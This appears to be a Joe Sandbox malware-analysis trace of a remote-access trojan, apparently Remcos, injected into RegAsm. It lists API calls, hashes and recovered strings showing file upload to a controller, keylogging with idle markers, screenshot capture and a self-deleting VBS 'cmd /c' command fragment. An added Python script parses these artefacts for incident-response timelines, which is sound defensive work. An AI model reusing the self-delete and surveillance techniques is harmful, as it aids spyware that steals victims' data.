                            • Associated: 00000008.00000002.875951516.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.875960236.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                            Similarity
                            • API ID: _strlen
                            • String ID: %m$~$Gon~$~F@7$~dra
                            APIs
                            • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041C742
                            • RegEnumKeyExA.ADVAPI32 ref: 0041C786
                            • RegCloseKey.ADVAPI32(?), ref: 0041CA50
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: CloseEnumOpen
                            • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                            APIs
                            • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041D66B
                            • GetCursorPos.USER32(?), ref: 0041D67A
                            • SetForegroundWindow.USER32(?), ref: 0041D683
                            • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041D69D
                            • Shell_NotifyIconA.SHELL32(00000002,00474B48), ref: 0041D6EE
                            • ExitProcess.KERNEL32 ref: 0041D6F6
                            • CreatePopupMenu.USER32 ref: 0041D6FC
                            • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041D711
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                            • String ID: Close
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: _free$Info
                            APIs
                            • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00408D1E
                            • GetFileSizeEx.KERNEL32(00000000,?), ref: 00408D56
                            • __aulldiv.LIBCMT ref: 00408D88
                              • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                              • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                            • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00408EAB
                            • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408EC6
                            • CloseHandle.KERNEL32(00000000), ref: 00408F9F
                            • CloseHandle.KERNEL32(00000000), ref: 00408FE9
                            • CloseHandle.KERNEL32(00000000), ref: 00409037
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                            • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $NG
                            APIs
                            • ___free_lconv_mon.LIBCMT ref: 10007D06
                              • Part of subcall function 100090BA: _free.LIBCMT ref: 100090D7
                              • Part of subcall function 100090BA: _free.LIBCMT ref: 100090E9
                              • Part of subcall function 100090BA: _free.LIBCMT ref: 100090FB
                              • Part of subcall function 100090BA: _free.LIBCMT ref: 1000910D
                              • Part of subcall function 100090BA: _free.LIBCMT ref: 1000911F
                              • Part of subcall function 100090BA: _free.LIBCMT ref: 10009131
                              • Part of subcall function 100090BA: _free.LIBCMT ref: 10009143
                              • Part of subcall function 100090BA: _free.LIBCMT ref: 10009155
                              • Part of subcall function 100090BA: _free.LIBCMT ref: 10009167
                              • Part of subcall function 100090BA: _free.LIBCMT ref: 10009179
                              • Part of subcall function 100090BA: _free.LIBCMT ref: 1000918B
                              • Part of subcall function 100090BA: _free.LIBCMT ref: 1000919D
                              • Part of subcall function 100090BA: _free.LIBCMT ref: 100091AF
                            • _free.LIBCMT ref: 10007CFB
                              • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                              • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                            • _free.LIBCMT ref: 10007D1D
                            • _free.LIBCMT ref: 10007D32
                            • _free.LIBCMT ref: 10007D3D
                            • _free.LIBCMT ref: 10007D5F
                            • _free.LIBCMT ref: 10007D72
                            • _free.LIBCMT ref: 10007D80
                            • _free.LIBCMT ref: 10007D8B
                            • _free.LIBCMT ref: 10007DC3
                            • _free.LIBCMT ref: 10007DCA
                            • _free.LIBCMT ref: 10007DE7
                            • _free.LIBCMT ref: 10007DFF
                            Memory Dump Source
                            • Source File: 00000008.00000002.875960236.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000008.00000002.875951516.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.875960236.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                            Similarity
                            • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                            APIs
                            • ___free_lconv_mon.LIBCMT ref: 0045138A
                              • Part of subcall function 00450582: _free.LIBCMT ref: 0045059F
                              • Part of subcall function 00450582: _free.LIBCMT ref: 004505B1
                              • Part of subcall function 00450582: _free.LIBCMT ref: 004505C3
                              • Part of subcall function 00450582: _free.LIBCMT ref: 004505D5
                              • Part of subcall function 00450582: _free.LIBCMT ref: 004505E7
                              • Part of subcall function 00450582: _free.LIBCMT ref: 004505F9
                              • Part of subcall function 00450582: _free.LIBCMT ref: 0045060B
                              • Part of subcall function 00450582: _free.LIBCMT ref: 0045061D
                              • Part of subcall function 00450582: _free.LIBCMT ref: 0045062F
                              • Part of subcall function 00450582: _free.LIBCMT ref: 00450641
                              • Part of subcall function 00450582: _free.LIBCMT ref: 00450653
                              • Part of subcall function 00450582: _free.LIBCMT ref: 00450665
                              • Part of subcall function 00450582: _free.LIBCMT ref: 00450677
                            • _free.LIBCMT ref: 0045137F
                              • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                              • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                            • _free.LIBCMT ref: 004513A1
                            • _free.LIBCMT ref: 004513B6
                            • _free.LIBCMT ref: 004513C1
                            • _free.LIBCMT ref: 004513E3
                            • _free.LIBCMT ref: 004513F6
                            • _free.LIBCMT ref: 00451404
                            • _free.LIBCMT ref: 0045140F
                            • _free.LIBCMT ref: 00451447
                            • _free.LIBCMT ref: 0045144E
                            • _free.LIBCMT ref: 0045146B
                            • _free.LIBCMT ref: 00451483
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                             • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                            • String ID:
                            • API String ID: 161543041-0
                            • Opcode ID: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                            • Instruction ID: 2428002f6fd8eb1a99257b9b861ac38f7c05b5b97acacff09fd9d8cf260fe807
                            • Opcode Fuzzy Hash: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                            • Instruction Fuzzy Hash: 403193715003009FEB20AA39D846F5B73E8EF02315F62992FE849D7662DF78AD44C729
                            APIs
                            • __EH_prolog.LIBCMT ref: 0041A04A
                            • GdiplusStartup.GDIPLUS(00474ACC,?,00000000), ref: 0041A07C
                            • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041A108
                            • Sleep.KERNEL32(000003E8), ref: 0041A18E
                            • GetLocalTime.KERNEL32(?), ref: 0041A196
                            • Sleep.KERNEL32(00000000,00000018,00000000), ref: 0041A285
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                             • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                            • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i$PG$PG$PG
                            • API String ID: 489098229-1431523004
                            • Opcode ID: a9a564c4fa78c27a57715e2126324e45245b8a766e259b72a025c3b0d3967f40
                            • Instruction ID: 12d64888f2a2aa40a87de1a625a26b3edd7a2139bf4817292c9f8cf1352d8a2d
                            • Opcode Fuzzy Hash: a9a564c4fa78c27a57715e2126324e45245b8a766e259b72a025c3b0d3967f40
                            • Instruction Fuzzy Hash: 7A517D70A002159ACB14BBB5C8529FD77A9AF54308F40407FF509AB1E2EF7C9D85C799
                            APIs
                            • Sleep.KERNEL32(00001388), ref: 0040A77B
                              • Part of subcall function 0040A6B0: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0040A6E6
                              • Part of subcall function 0040A6B0: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A788), ref: 0040A6F5
                              • Part of subcall function 0040A6B0: Sleep.KERNEL32(00002710,?,?,?,0040A788), ref: 0040A722
                              • Part of subcall function 0040A6B0: CloseHandle.KERNEL32(00000000), ref: 0040A729
                            • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040A7B7
                            • GetFileAttributesW.KERNEL32(00000000), ref: 0040A7C8
                            • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040A7DF
                            • PathFileExistsW.SHLWAPI(00000000), ref: 0040A859
                              • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                            • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00466478,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A962
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                             • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                            • String ID: 8SG$8SG$;S$PG$PG
                            • API String ID: 3795512280-174529128
                            • Opcode ID: 9258c9cb72664625fd59994fadaa45554d81da2cd969a08f99f121fbef191fed
                            • Instruction ID: 2a79d88b44a8fc0b04dcb000ea34af81e4c48788ca5147296d011aa32960a087
                            • Opcode Fuzzy Hash: 9258c9cb72664625fd59994fadaa45554d81da2cd969a08f99f121fbef191fed
                            • Instruction Fuzzy Hash: B6516E716043015ACB15BB72C866ABE77AA9F80349F00483FF646B71E2DF7C9D09865E
                            APIs
                              • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                              • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                              • Part of subcall function 00413733: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000), ref: 0041374F
                              • Part of subcall function 00413733: RegQueryValueExA.KERNEL32 ref: 00413768
                              • Part of subcall function 00413733: RegCloseKey.KERNEL32(00000000), ref: 00413773
                            • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040D894
                            • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D9F3
                            • ExitProcess.KERNEL32 ref: 0040D9FF
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                             • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                            • String ID: """, 0$.vbs$8SG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                            • API String ID: 1913171305-3159800282
                            • Opcode ID: 8db7f9089fcdac6088c6dca5af5b566ceab7d3a4e33a82e448366c6afc64066d
                            • Instruction ID: 6f299f75ad759bd4c56b3f4cab90e5e1fe41ff60d22e8747b975e3d2bb757992
                            • Opcode Fuzzy Hash: 8db7f9089fcdac6088c6dca5af5b566ceab7d3a4e33a82e448366c6afc64066d
                            • Instruction Fuzzy Hash: 9B4129719001155ACB15FBA2DC56DEEB778AF50709F10017FB10AB21E2FF785E8ACA98
                            APIs
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                             • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: _free
                            • String ID:
                            • API String ID: 269201875-0
                            • Opcode ID: f91d4b90763e5671f10523a72ee64b05bbc7cd6159c247d47fb1287d0ca389aa
                            • Instruction ID: 80ca3ff3fa16d46db3e6ae4c9b8471dba03f652ca918f9f25067e0b92ee87d4d
                            • Opcode Fuzzy Hash: f91d4b90763e5671f10523a72ee64b05bbc7cd6159c247d47fb1287d0ca389aa
                            • Instruction Fuzzy Hash: 30C183B6D40204ABEB20DBA9CC43FDE77F8AB09705F150166FE04EB283D6B49D459768
                            APIs
                              • Part of subcall function 00455929: CreateFileW.KERNEL32(00000000,00000000,?,00455D04,?,?,00000000), ref: 00455946
                            • GetLastError.KERNEL32 ref: 00455D6F
                            • __dosmaperr.LIBCMT ref: 00455D76
                            • GetFileType.KERNEL32 ref: 00455D82
                            • GetLastError.KERNEL32 ref: 00455D8C
                            • __dosmaperr.LIBCMT ref: 00455D95
                            • CloseHandle.KERNEL32(00000000), ref: 00455DB5
                            • CloseHandle.KERNEL32(?), ref: 00455EFF
                            • GetLastError.KERNEL32 ref: 00455F31
                            • __dosmaperr.LIBCMT ref: 00455F38
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                             • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                            • String ID: H
                            • API String ID: 4237864984-2852464175
                            • Opcode ID: 3e80e4deedef708004bf5c1f14aafc2c87dd9643035db764e93b071d2df20022
                            • Instruction ID: 7cd045c9b8f196398d23f94ba58010557f508cd7b58f44c29b3e784ccbbfb847
                            • Opcode Fuzzy Hash: 3e80e4deedef708004bf5c1f14aafc2c87dd9643035db764e93b071d2df20022
                            • Instruction Fuzzy Hash: 44A14532A106049FDF19AF68DC657BE3BA0EB06325F24015EEC11AB392D6398D1AC759
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                             • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: _free
                            • String ID: \&G$\&G$`&G
                            • API String ID: 269201875-253610517
                            • Opcode ID: fb4e3dbc149d2c7ead481d14af816bdca3ff316622b678324ba67e9487465dd6
                            • Instruction ID: 59c4f5d9f803fa3be21c2588ad204ea2c1e8261bb9e1a4607c4596bf86990b35
                            • Opcode Fuzzy Hash: fb4e3dbc149d2c7ead481d14af816bdca3ff316622b678324ba67e9487465dd6
                            • Instruction Fuzzy Hash: 86610E75900205AFDB21DF69C842B9ABBF4EF06710F24426BED44EB242E774AD45CB58
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                             • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: 65535$udp
                            • API String ID: 0-1267037602
                            • Opcode ID: 92e56e7e39f2557d79d3192c533dec3724d183fd0175ec4c26052f24408cebce
                            • Instruction ID: a9902b4e2b63063b067a15c036b171ad6d3a8658db747517b03e91dd9f9ead29
                            • Opcode Fuzzy Hash: 92e56e7e39f2557d79d3192c533dec3724d183fd0175ec4c26052f24408cebce
                            • Instruction Fuzzy Hash: FB51D431605301ABDB609B14E905BFB77E8ABC5754F08042FF88597390E76CCCC1969E
                            APIs
                            • __Init_thread_footer.LIBCMT ref: 0040AD73
                            • Sleep.KERNEL32(000001F4), ref: 0040AD7E
                            • GetForegroundWindow.USER32 ref: 0040AD84
                            • GetWindowTextLengthW.USER32 ref: 0040AD8D
                            • GetWindowTextW.USER32 ref: 0040ADC1
                            • Sleep.KERNEL32(000003E8), ref: 0040AE8F
                              • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,00000000,0040B245,00000000), ref: 0040A69D
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                             • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                            • String ID: [${ User has been idle for $ minutes }$]
                            • API String ID: 911427763-3954389425
                            • Opcode ID: 48f1adaacdea2f975f01b8500f115fca2f5cc24c7704d57e661a1b5e6bda6b32
                            • Instruction ID: 479ab846abdc3ffa357cf8cfb056c4a9d7a1c57035fbb5610920680a3dc8d5cf
                            • Opcode Fuzzy Hash: 48f1adaacdea2f975f01b8500f115fca2f5cc24c7704d57e661a1b5e6bda6b32
                            • Instruction Fuzzy Hash: 1251E2716043419BD714FB22D856AAE7795AF84308F10093FF986A22E2EF7C9D44C69F
                            APIs
                            • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A912
                            • GetLastError.KERNEL32(?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A91F
                            • __dosmaperr.LIBCMT ref: 0043A926
                            • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A952
                            • GetLastError.KERNEL32(?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A95C
                            • __dosmaperr.LIBCMT ref: 0043A963
                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D55,?), ref: 0043A9A6
                            • GetLastError.KERNEL32(?,?,?,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A9B0
                            • __dosmaperr.LIBCMT ref: 0043A9B7
                            • _free.LIBCMT ref: 0043A9C3
                            • _free.LIBCMT ref: 0043A9CA
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                             • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                            • String ID:
                            • API String ID: 2441525078-0
                            • Opcode ID: 1b21161869a1c6c97ce00f002d4111b93a94d55ba7b455788bfa216644d838f2
                            • Instruction ID: 3a2165a63a30732921e8d6571a772c998230e0148124485b419b79488018c54b
                            • Opcode Fuzzy Hash: 1b21161869a1c6c97ce00f002d4111b93a94d55ba7b455788bfa216644d838f2
                            • Instruction Fuzzy Hash: 8631D5B180420AFBDF01AFA5CC45EAF3B6CEF09324F11451AF950662A1DB38CD61DB66
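The three functions above give away the on-disk formats an incident responder later has to recover: capture files named `time_%04i%02i%02i_%02i%02i%02i` or `wnd_%04i%02i%02i_%02i%02i%02i` (timer-driven versus window-change-driven captures), the `{ User has been idle for N minutes }` marker written by the foreground-window loop, and the `%Y-%m-%d %H.%M` timestamp passed through MultiByteToWideChar. The following is an added example, not code from the Joe Sandbox report or from the Remcos sample, that turns a directory listing and recovered keylog lines into one ordered timeline. Only the format strings come from the report; the file extension, the position of the timestamp inside a log line, the reading of the idle marker as "idle ended at this timestamp after N minutes", and the sample names and lines are assumptions constructed for this example.

```python
"""Rebuild a timeline from Remcos-style capture names and keylog markers.

Added example for incident response; not code from the Joe Sandbox report or
from the Remcos sample. Only the format strings come from the report; the
extension, the line layout and the sample data are assumptions.
"""
from __future__ import annotations
from collections import Counter
from datetime import datetime, timedelta
import re

# time_%04i%02i%02i_%02i%02i%02i / wnd_%04i%02i%02i_%02i%02i%02i, any extension (assumed)
CAPTURE_RE = re.compile(r"^(?P<trigger>time|wnd)_(?P<stamp>\d{8}_\d{6})(?:\.\w+)?$")
# "{ User has been idle for " + N + " minutes }"  (pieces of the String ID above)
IDLE_RE = re.compile(r"\{ User has been idle for (?P<minutes>\d+) minutes \}")
# strftime("%Y-%m-%d %H.%M") anywhere in the log line (its position is assumed)
STAMP_RE = re.compile(r"\d{4}-\d{2}-\d{2} \d{2}\.\d{2}")

TRIGGER = {"time": "timer", "wnd": "window-change"}

def parse_capture_name(name: str) -> tuple[str, datetime] | None:
    """Map a capture file name to (trigger kind, capture time); None if not a capture."""
    m = CAPTURE_RE.match(name)
    if not m:
        return None
    return TRIGGER[m.group("trigger")], datetime.strptime(m.group("stamp"), "%Y%m%d_%H%M%S")

def parse_keylog_line(line: str) -> tuple[datetime, str, str] | None:
    """Return (time, kind, detail) for a timestamped keylog line, else None.

    An idle marker is read as "idle ended at this timestamp after N minutes"
    (an assumption), so the detail records when the idle period began.
    """
    ts = STAMP_RE.search(line)
    if not ts:
        return None
    when = datetime.strptime(ts.group(0), "%Y-%m-%d %H.%M")
    idle = IDLE_RE.search(line)
    if idle:
        since = when - timedelta(minutes=int(idle.group("minutes")))
        return when, "idle", f"since {since:%Y-%m-%d %H:%M}"
    return when, "keylog", line.replace(ts.group(0), "", 1).strip(" []")

def build_timeline(capture_names, keylog_lines):
    """Merge capture files and keylog lines into one list sorted by time."""
    events = []
    for name in capture_names:
        cap = parse_capture_name(name)
        if cap:
            events.append((cap[1], "capture", cap[0]))
    for line in keylog_lines:
        ev = parse_keylog_line(line)
        if ev:
            events.append(ev)
    return sorted(events)

def trigger_counts(events) -> Counter:
    """How many captures were timer-driven vs. window-change-driven."""
    return Counter(detail for _, kind, detail in events if kind == "capture")

# Constructed sample data (not from the report).
SAMPLE_FILES = ["time_20240830_120000.jpg", "wnd_20240830_120530.jpg",
                "time_20240830_121500.jpg", "notes.txt"]
SAMPLE_LOG = ["[2024-08-30 12.05] Untitled - Notepad",
              "[2024-08-30 12.40] [{ User has been idle for 25 minutes }]"]

if __name__ == "__main__":
    timeline = build_timeline(SAMPLE_FILES, SAMPLE_LOG)
    for when, kind, detail in timeline:
        print(f"{when:%Y-%m-%d %H:%M:%S}  {kind:8}  {detail}")
    print(dict(trigger_counts(timeline)))
```

A run of `wnd_` captures clustered around a keylog line for a browser or mail client window is the operator watching a specific application; `time_` captures at a fixed interval are the unattended mode. Either way the timestamps are in the victim machine's local time (the loop above calls GetLocalTime), so convert before correlating with server-side logs.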
                            APIs
                            • SetEvent.KERNEL32(?,?), ref: 004054BF
                            • GetMessageA.USER32 ref: 0040556F
                            • TranslateMessage.USER32(?), ref: 0040557E
                            • DispatchMessageA.USER32 ref: 00405589
                            • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F78), ref: 00405641
                            • HeapFree.KERNEL32(00000000,00000000,0000003B), ref: 00405679
                              • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                             • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                            • String ID: CloseChat$DisplayMessage$GetMessage
                            • API String ID: 2956720200-749203953
                            • Opcode ID: 4cad7ca28deb6409f2f78627fcedf8289f6fecf8c3360a11cdc8c366f959628d
                            • Instruction ID: d37e718accd843302ceacc2187c81124e04698433963f5de03abd71ab6b9016f
                            • Opcode Fuzzy Hash: 4cad7ca28deb6409f2f78627fcedf8289f6fecf8c3360a11cdc8c366f959628d
                            • Instruction Fuzzy Hash: 39419071A04301ABCB14FB76DC5A86F37A9AB85704F40493EF516A31E1EF3C8905CB9A
                            APIs
                              • Part of subcall function 00417F67: __EH_prolog.LIBCMT ref: 00417F6C
                            • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,004660B4), ref: 00417E17
                            • CloseHandle.KERNEL32(00000000), ref: 00417E20
                            • DeleteFileA.KERNEL32(00000000), ref: 00417E2F
                            • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00417DE3
                              • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                             • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
